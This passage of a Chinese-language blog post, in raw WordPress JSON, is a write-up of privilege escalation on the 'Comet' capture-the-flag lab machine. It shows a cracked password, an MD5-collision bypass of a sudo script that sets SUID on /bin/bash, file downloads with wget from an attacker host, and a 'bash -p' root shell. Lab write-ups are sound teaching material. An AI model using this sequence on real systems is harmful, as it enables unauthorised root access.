ret<\/code><\/pre>\n\u53d1\u73b0\u8c03\u7528\u4e86md5<\/code>\uff0c\u5c1d\u8bd5\u89e3\u5bc6\u4e00\u4e0b\uff1a<\/p>\nb8728ab81a3c3391f5f63f39da72ee89f43f9a9f429bc8cfe858f8048eaad2b1<\/code><\/pre>\n<\/div><\/p>\njoe\nprettywoman<\/code><\/pre>\n<\/div><\/p>\n\u63d0\u6743<\/h2>\n\u4fe1\u606f\u641c\u96c6<\/h3>\njoe@comet:~$ sudo -l\nMatching Defaults entries for joe on comet:\n env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser joe may run the following commands on comet:\n (ALL : ALL) NOPASSWD: \/bin\/bash \/home\/joe\/coll\njoe@comet:~$ file \/home\/joe\/coll\n\/home\/joe\/coll: Bourne-Again shell script, ASCII text executable\njoe@comet:~$ cat \/home\/joe\/coll\n#!\/bin\/bash\nexec 2>\/dev\/null\n\nfile1=\/home\/joe\/file1\nfile2=\/home\/joe\/file2\nmd5_1=$(md5sum $file1 | awk '{print $1}')\nmd5_2=$(md5sum $file2 | awk '{print $1}')\n\nif [[ $(head -n 1 $file1) == "HMV" ]] && \n [[ $(head -n 1 $file2) == "HMV" ]] && \n [[ $md5_1 == $md5_2 ]] && \n [[ $(diff -q $file1 $file2) ]]; then\n chmod +s \/bin\/bash\n exit 0\nelse\n exit 1\nfi\njoe@comet:~$ cat user.txt \ncc32dbc17ec3ddf89f9e6d0991c82616\njoe@comet:~$ ls -la\ntotal 32\ndrwxr-xr-x 3 joe joe 4096 Feb 19 2023 .\ndrwxr-xr-x 3 root root 4096 Feb 19 2023 ..\nlrwxrwxrwx 1 root root 9 Feb 25 2023 .bash_history -> \/dev\/null\n-rw-r--r-- 1 joe joe 220 Feb 19 2023 .bash_logout\n-rw-r--r-- 1 joe joe 3526 Feb 19 2023 .bashrc\n-rwxr-xr-x 1 root root 366 Feb 19 2023 coll\ndrwxr-xr-x 3 joe joe 4096 Feb 19 2023 .local\n-rw-r--r-- 1 joe joe 807 Feb 19 2023 .profile\n-rwx------ 1 joe joe 33 Feb 19 2023 user.txt<\/code><\/pre>\n\u5bfb\u627e\u4e24\u4e2a\u6587\u4ef6\uff0cmd5<\/code> \u524d\u7f00\u90fd\u662fHMV<\/code>\uff0c\u4e14md5<\/code>\u76f8\u540c\uff1a<\/p>\n\u5728\u5e08\u5085blog\u53d1\u73b0\u53e6\u4e00\u4e2a\u6bd4\u8f83\u65b9\u4fbf\u7684\u5de5\u5177\uff01<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/md5collgen]\n\u2514\u2500$ chmod +x md5collgen \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/md5collgen]\n\u2514\u2500$ echo HMV > flag \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/md5collgen]\n\u2514\u2500$ .\/md5collgen flag\nMD5 collision generator v1.5\nby Marc Stevens (http:\/\/www.win.tue.nl\/hashclash\/)\n\nUsing output filenames: 'msg1.bin' and 'msg2.bin'\nUsing prefixfile: 'flag'\nUsing initial value: 66fdfd128fcadfc4946a54c7a85dc86d\n\nGenerating first block: ......\nGenerating second block: S00...........\nRunning time: 3.25897 s\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/md5collgen]\n\u2514\u2500$ ls -la \ntotal 3284\ndrwxr-xr-x 2 kali kali 4096 Apr 26 03:46 .\ndrwx------ 58 kali kali 4096 Apr 26 03:42 ..\n-rw-r--r-- 1 kali kali 4 Apr 26 03:46 flag\n-rwxr-xr-x 1 kali kali 3338360 Apr 26 03:44 md5collgen\n-rw-r--r-- 1 kali kali 192 Apr 26 03:46 msg1.bin\n-rw-r--r-- 1 kali kali 192 Apr 26 03:46 msg2.bin\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/md5collgen]\n\u2514\u2500$ head msg1.bin \nHMV\nB\ufffdw\ufffd'U\ufffdx\ufffd\ufffd\u0135\ufffd\ufffd\ufffdy\ufffd?-\ufffdx>)*\ufffd\ufffd\ufffd \ufffd\ufffd\u00f7\ufffdCY\ufffd!\ufffdVK\ufffd\ufffd\u949c\u0716\ufffd\ufffd\u30ad\\\ufffd\ufffd\ufffd\ufffdw\ufffd\ufffd\/l_\ufffd\ufffd\ufffd\u025b\ufffd!\ufffd1\ufffdv!\ufffdW\ufffd\ufffd ]\ufffd\ufffd\ufffd\ufffd}\u059e"\ufffd\ufffd\ufffd\ufffd\ufffd\ufffdJ\ufffd\u0238\ufffd\ufffd:\n i]\ufffd@|Aw\ufffd\ufffd\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/md5collgen]\n\u2514\u2500$ head msg2.bin \nHMV\nJ\ufffd\u0238\ufffd\ufffd:\ufffdx\ufffd\ufffd\u0135\ufffd~\ufffdy\ufffd?-\ufffdx>)*\ufffd\ufffd\ufffd \ufffd\ufffd\u00f7\ufffdCY\ufffd!hWK\ufffd\ufffd\u949c\u0716\ufffd\ufffd\ufffd\ufffd\\\ufffd\ufffd\ufffd\ufffdw\ufffd\ufffd\/l_\ufffd\ufffd\ufffd\u025b\ufffd!\ufffd1Sv!\ufffdW\ufffd\ufffd ]\ufffd\ufffd\ufffd\ufffd}\u059e"\ufffd\ufffd\ufffd\ufffd\ufffd\n i]\ufffd@\ufffdAw\ufffd\ufffd<\/code><\/pre>\n\u5c1d\u8bd5\u4e0a\u4f20\uff1a<\/p>\n
joe@comet:~$ ls -l \/bin\/bash\n-rwxr-xr-x 1 root root 1234376 Mar 27 2022 \/bin\/bash\njoe@comet:~$ wget http:\/\/192.168.0.143:8888\/file1\n--2024-04-26 09:57:57-- http:\/\/192.168.0.143:8888\/file1\nConnecting to 192.168.0.143:8888... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 192 [application\/octet-stream]\nSaving to: \u2018file1\u2019\n\nfile1 100%[=========================================================================>] 192 --.-KB\/s in 0.01s \n\n2024-04-26 09:57:57 (16.4 KB\/s) - \u2018file1\u2019 saved [192\/192]\n\njoe@comet:~$ wget http:\/\/192.168.0.143:8888\/file2\n--2024-04-26 09:58:00-- http:\/\/192.168.0.143:8888\/file2\nConnecting to 192.168.0.143:8888... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 192 [application\/octet-stream]\nSaving to: \u2018file2\u2019\n\nfile2 100%[=========================================================================>] 192 --.-KB\/s in 0s \n\n2024-04-26 09:58:00 (36.7 MB\/s) - \u2018file2\u2019 saved [192\/192]\n\njoe@comet:~$ sudo -l\nMatching Defaults entries for joe on comet:\n env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser joe may run the following commands on comet:\n (ALL : ALL) NOPASSWD: \/bin\/bash \/home\/joe\/coll\njoe@comet:~$ sudo \/bin\/bash \/home\/joe\/coll\njoe@comet:~$ ls -l \/bin\/bash\n-rwsr-sr-x 1 root root 1234376 Mar 27 2022 \/bin\/bash\njoe@comet:~$ bash -p\nbash-5.1# cd \/root\nbash-5.1# ls -la\ntotal 24\ndrwx------ 3 root root 4096 Feb 21 2023 .\ndrwxr-xr-x 18 root root 4096 Feb 20 2023 ..\nlrwxrwxrwx 1 root root 9 Feb 6 2023 .bash_history -> \/dev\/null\n-rw-r--r-- 1 root root 571 Apr 10 2021 .bashrc\ndrwxr-xr-x 3 root root 4096 Feb 19 2023 .local\n-rw-r--r-- 1 root root 161 Jul 9 2019 .profile\n-rwx------ 1 root root 33 Feb 6 2023 root.txt\nbash-5.1# cat root.txt \n052cf26a6e7e33790391c0d869e2e40c<\/code><\/pre>\n\u62ff\u4e0bflag\uff01\uff01\uff01\uff01\uff01<\/p>\n","protected":false},"excerpt":{"rendered":"
Comet \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf \u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/comet] \u2514\u2500$ rusts […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,18],"tags":[],"class_list":["post-631","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/631","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=631"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/631\/revisions"}],"predecessor-version":[{"id":632,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/631\/revisions\/632"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=631"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=631"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=631"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
![\"image-20240426144234797\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404261559057.png\")
<\/div><\/p>\n![\"image-20240426144511125\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404261559058.png\")
<\/div><\/p>\n![\"image-20240426150609881\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404261559059.png\")
<\/div><\/p>\n![\"image-20240426152232677\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404261559060.png\")
<\/div><\/p>\n![\"image-20240426152420064\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404261559062.png\")
<\/div><\/p>\n